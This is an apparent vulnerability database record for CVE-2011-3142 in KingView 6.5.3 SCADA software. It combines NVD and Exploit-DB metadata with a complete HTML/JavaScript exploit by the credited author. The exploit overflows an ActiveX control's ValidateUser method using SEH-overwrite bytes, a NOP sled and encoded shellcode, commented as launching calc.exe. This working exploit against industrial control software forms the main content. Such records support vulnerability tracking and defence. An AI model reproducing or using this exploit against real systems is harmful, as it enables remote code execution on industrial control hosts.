ID
VAR-E-201103-0456
CVE
| cve_id: | CVE-2011-3142 | Trust: 1.9 |
EDB ID
16936
TITLE
KingView 6.5.3 SCADA - ActiveX - Windows remote Exploit
Trust: 0.6
DESCRIPTION
KingView 6.5.3 SCADA - ActiveX. CVE-72889CVE-2011-3142 . remote exploit for Windows platform
Trust: 0.6
AFFECTED PRODUCTS
| vendor: | kingview | model: | scada | scope: | eq | version: | 6.5.3 | Trust: 1.0 |
| vendor: | wellintech | model: | kingview | scope: | eq | version: | 6.53 | Trust: 0.3 |
EXPLOIT
# Exploit Title: KingView 6.5.3 SCADA ActiveX
# Date: March 07 2011
# Author: Carlos Mario Penagos Hollmann
# Software Link: http://download.kingview.com/software/kingview%20English%20Version/kingview6.53_EN.rar
# Version: 6.53 (English)
# Tested on: Windows xp sp3 running on VMware Fusion 3.1 and VirtualBox 3.2.8
Thanks to Dillon Beresford for Heap Exploit
<html>
mail----> shogilord^gmail.com spams are welcome!!!!!
________ _ _________ ____ __ _____ ________
/ ____/ / | | / / ____/ | / / //_// _/ | / / ____/
/ __/ / / | | / / __/ / |/ / ,< / // |/ / / __
/ /___/ /___| |/ / /___/ /| / /| |_/ // /| / /_/ /
/_____/_____/|___/_____/_/ |_/_/ |_/___/_/ |_/\____/
COLOMBIA hacking presents.............
Beijing WellinControl Technology Development Co.,Ltd FIX your KVWebSvr.dll
<object classid='clsid:F31C42E3-CBF9-4E5C-BB95-521B4E85060D' id='target' /></object>
<script language='javascript'>
nse="\xEB\x06\x90\x90";
seh="\x4E\x20\xD1\x72";
nops="\x90";
while (nops.length<10){ nops+="\x90";}
/*Calc.exe alpha_upper badchars --> "\x8b\x93\x83\x8a\x8c\x8d\x8f\x8e\x87\x81\x84\x86\x88\x89\x90\x91\x92\x94\x95\x96\x97\x98\x99\x82\x85\x9f\x9a\x9e\x9d\x9b\x9f\x76*/
shell="\x54\x5f\xda\xdf\xd9\x77\xf4\x5e\x56\x59\x49\x49\x49\x49\x43\x43\x43\x43\x43\x43\x51\x5a\x56\x54\x58\x33\x30\x56\x58\x34\x41\x50\x30\x41\x33\x48\x48\x30\x41\x30\x30\x41\x42\x41\x41\x42\x54\x41\x41\x51\x32\x41\x42\x32\x42\x42\x30\x42\x42\x58\x50\x38\x41\x43\x4a\x4a\x49\x4c\x4b\x5a\x4c\x50\x55\x4c\x4b\x5a\x4c\x43\x58\x51\x30\x51\x30\x51\x30\x56\x4f\x52\x48\x52\x43\x45\x31\x52\x4c\x43\x53\x4c\x4d\x51\x55\x5a\x58\x56\x30\x58\x38\x49\x57\x4d\x43\x49\x52\x54\x37\x4b\x4f\x58\x50\x41\x41";
junk1="A";
junk2="A";
while (junk1.length<624){ junk1+=junk1;}
junk1=junk1.substring(0,624);
junk2=junk1;
while (junk2.length<8073){ junk2+=junk2;}
arg2=junk1+nse+seh+nops+shell+junk2;
arg1="Anything";
target.ValidateUser(arg1 ,arg2);
</script>
Trust: 1.0
EXPLOIT LANGUAGE
html
Trust: 0.6
PRICE
free
Trust: 0.6
TYPE
ActiveX
Trust: 1.0
CREDITS
Carlos Mario Penagos Hollmann
Trust: 0.6
EXTERNAL IDS
| db: | NVD | id: | CVE-2011-3142 | Trust: 1.9 |
| db: | EXPLOIT-DB | id: | 16936 | Trust: 1.6 |
| db: | EDBNET | id: | 39617 | Trust: 0.6 |
| db: | BID | id: | 46757 | Trust: 0.3 |
REFERENCES
| url: | https://nvd.nist.gov/vuln/detail/cve-2011-3142 | Trust: 1.6 |
| url: | https://www.exploit-db.com/exploits/16936/ | Trust: 0.6 |
| url: | http://en.wellintech.com/products/detail.aspx?contentid=15 | Trust: 0.3 |
SOURCES
| db: | BID | id: | 46757 |
| db: | EXPLOIT-DB | id: | 16936 |
| db: | EDBNET | id: | 39617 |
LAST UPDATE DATE
2022-07-27T10:03:36.573000+00:00
SOURCES UPDATE DATE
| db: | BID | id: | 46757 | date: | 2015-04-13T21:01:00 |
SOURCES RELEASE DATE
| db: | BID | id: | 46757 | date: | 2011-03-07T00:00:00 |
| db: | EXPLOIT-DB | id: | 16936 | date: | 2011-03-07T00:00:00 |
| db: | EDBNET | id: | 39617 | date: | 2011-03-07T00:00:00 |